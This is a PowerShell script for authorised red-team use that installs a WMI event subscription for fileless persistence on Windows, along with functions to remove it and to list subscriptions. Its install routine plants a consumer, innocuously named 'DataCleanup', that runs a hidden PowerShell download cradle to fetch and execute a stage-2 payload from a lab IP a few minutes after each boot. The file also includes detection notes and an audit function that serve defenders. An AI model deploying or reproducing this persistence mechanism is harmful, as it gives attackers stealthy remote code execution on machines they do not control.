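<#
.SYNOPSIS
    Install, remove and enumerate a WMI permanent event subscription used for
    fileless persistence (MITRE ATT&CK T1546.003 - Event Triggered Execution: WMI
    Event Subscription).

.DESCRIPTION
    Credits to @mattifestation for his awesome work on WMI and PowerShell fileless
    persistence. This script is an adaptation of his work.

    Install-Persistence writes three objects into the root/subscription namespace:
      * an __EventFilter whose WQL query polls Win32_PerfFormattedData_PerfOS_System
        every 60 seconds and matches while SystemUpTime is between 240 and 325 s,
        i.e. the filter fires roughly once per boot, 4-5 minutes after startup;
      * a CommandLineEventConsumer that runs "powershell.exe -nop -c IEX (...)" to
        download and execute a stage-2 script from $PayloadUrl;
      * a __FilterToConsumerBinding tying the two together.
    Remove-Persistence deletes them again (binding first, then consumer, then filter).
    Check-WMI lists every filter/consumer/binding on the host, not just this script's,
    so it doubles as an audit of the namespace.

    Writing to root/subscription requires local Administrator rights; Install- and
    Remove-Persistence check for that up front instead of failing on the first
    Set-WmiInstance/Remove-WmiObject call.

    Defender notes: creation of these three object types is logged by Sysmon
    (Event IDs 19, 20 and 21) and by the Microsoft-Windows-WMI-Activity/Operational
    log (Event ID 5861, which includes the consumer's command line). The stage-2
    fetch is plain HTTP and the consumer command line is stored in clear text in
    the WMI repository.

.NOTES
    For authorised red-team / lab use only. The default PayloadUrl points at a lab
    address and must be changed for any other environment.
#>

# Returns $true when the current process token holds the local Administrators role.
# root/subscription cannot be written without it, so both install and removal
# refuse early with a readable error instead of an opaque WMI access-denied.
function Test-IsLocalAdministrator {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

<#
.SYNOPSIS
    Create the event filter, command-line consumer and binding in root/subscription.
.PARAMETER PayloadUrl
    URL the consumer's PowerShell command line downloads and IEX-executes.
    Defaults to the original hard-coded lab address.
.PARAMETER EventFilterName
    Name of the __EventFilter instance (default 'Cleanup').
.PARAMETER EventConsumerName
    Name of the CommandLineEventConsumer instance (default 'DataCleanup').
.OUTPUTS
    None. Writes progress to the host; throws if not elevated or if objects with the
    same names already exist (run Remove-Persistence first).
#>
function Install-Persistence {
    [CmdletBinding()]
    param(
        [string]$PayloadUrl        = 'http://172.16.134.129:80/a',
        [string]$EventFilterName   = 'Cleanup',
        [string]$EventConsumerName = 'DataCleanup'
    )

    if (-not (Test-IsLocalAdministrator)) {
        throw 'Install-Persistence: writing to root/subscription requires an elevated (Administrator) session.'
    }

    # Refuse to silently overwrite or duplicate an existing subscription with the
    # same key; the caller must Remove-Persistence first.
    $existingFilter   = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    $existingConsumer = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    if (($null -ne $existingFilter) -or ($null -ne $existingConsumer)) {
        throw "Install-Persistence: filter '$EventFilterName' or consumer '$EventConsumerName' already exists; run Remove-Persistence first."
    }

    # Stage-2 download cradle; with the default URL this is byte-identical to the
    # original script's command line.
    $Payload      = "((new-object net.webclient).downloadstring('$PayloadUrl'))"
    $finalPayload = "powershell.exe -nop -c `"IEX $Payload`""

    # Create event filter. WITHIN 60 = 60 s polling interval; the 240-325 s uptime
    # window is wider than one poll, so the consumer typically runs once per boot.
    $EventFilterArgs = @{
        EventNamespace = 'root/cimv2'
        Name           = $EventFilterName
        Query          = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
        QueryLanguage  = 'WQL'
    }
    $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

    # Create CommandLineEventConsumer
    $CommandLineConsumerArgs = @{
        Name                = $EventConsumerName
        CommandLineTemplate = $finalPayload
    }
    $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs

    # Create FilterToConsumerBinding
    $FilterToConsumerArgs = @{
        Filter   = $Filter
        Consumer = $Consumer
    }
    $null = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs

    # Confirm each object landed; the original only reported success, so a partial
    # install (e.g. binding rejected) went unnoticed.
    $EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"
    if ($null -ne $EventCheck) {
        Write-Host "Event Filter $EventFilterName successfully written to host"
    } else {
        Write-Warning "Event Filter $EventFilterName was NOT found after creation"
    }

    $ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    if ($null -ne $ConsumerCheck) {
        Write-Host "Event Consumer $EventConsumerName successfully written to host"
    } else {
        Write-Warning "Event Consumer $EventConsumerName was NOT found after creation"
    }

    $BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'"""
    if ($null -ne $BindingCheck) {
        Write-Host "Filter To Consumer Binding successfully written to host"
    } else {
        Write-Warning "Filter To Consumer Binding for $EventFilterName was NOT found after creation"
    }
}

<#
.SYNOPSIS
    Remove the subscription created by Install-Persistence.
.PARAMETER EventFilterName
    Name of the __EventFilter to delete (default 'Cleanup').
.PARAMETER EventConsumerName
    Name of the CommandLineEventConsumer to delete (default 'DataCleanup').
.OUTPUTS
    None. Missing objects are skipped with a warning rather than treated as an error,
    so the function is safe to run repeatedly.
#>
function Remove-Persistence {
    [CmdletBinding()]
    param(
        [string]$EventFilterName   = 'Cleanup',
        [string]$EventConsumerName = 'DataCleanup'
    )

    if (-not (Test-IsLocalAdministrator)) {
        throw 'Remove-Persistence: deleting from root/subscription requires an elevated (Administrator) session.'
    }

    $consumer = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'"
    $filter   = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'"

    # The original built "REFERENCES OF {$consumer.__RELPATH}" unconditionally; with
    # the consumer already gone that query is malformed and the binding (which keeps
    # the subscription alive) was never removed. Resolve bindings from whichever
    # endpoint still exists and de-duplicate by path.
    $bindings = @()
    foreach ($endpoint in @($consumer, $filter)) {
        if ($null -ne $endpoint) {
            $bindings += Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($endpoint.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
        }
    }
    $bindings = @($bindings | Where-Object { $null -ne $_ } | Sort-Object -Property __PATH -Unique)

    # Same order as the original: binding first, then consumer, then filter.
    if ($bindings.Count -gt 0) {
        $bindings | Remove-WmiObject
        Write-Host "Removed $($bindings.Count) Filter To Consumer Binding(s)"
    } else {
        Write-Warning "No Filter To Consumer Binding found for '$EventFilterName' / '$EventConsumerName'"
    }

    if ($null -ne $consumer) {
        $consumer | Remove-WmiObject
        Write-Host "Removed Event Consumer $EventConsumerName"
    } else {
        Write-Warning "Event Consumer $EventConsumerName not found"
    }

    if ($null -ne $filter) {
        $filter | Remove-WmiObject
        Write-Host "Removed Event Filter $EventFilterName"
    } else {
        Write-Warning "Event Filter $EventFilterName not found"
    }
}

<#
.SYNOPSIS
    List every event filter, command-line consumer and binding in root/subscription.
.DESCRIPTION
    Enumerates the whole namespace, not only the objects this script creates, so it
    can be used to audit a host for any WMI subscription persistence. Reading the
    namespace does not normally require elevation. (The verb "Check" is not on the
    approved-verb list; the name is kept for compatibility with existing callers.)
.OUTPUTS
    System.Management.ManagementObject instances for each object found.
#>
function Check-WMI {
    [CmdletBinding()]
    param()

    Write-Host "Showing All Root Event Filters"
    Get-WmiObject -Namespace root/subscription -Class __EventFilter

    Write-Host "Showing All CommandLine Event Consumers"
    Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer

    Write-Host "Showing All Filter to Consumer Bindings"
    Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding
}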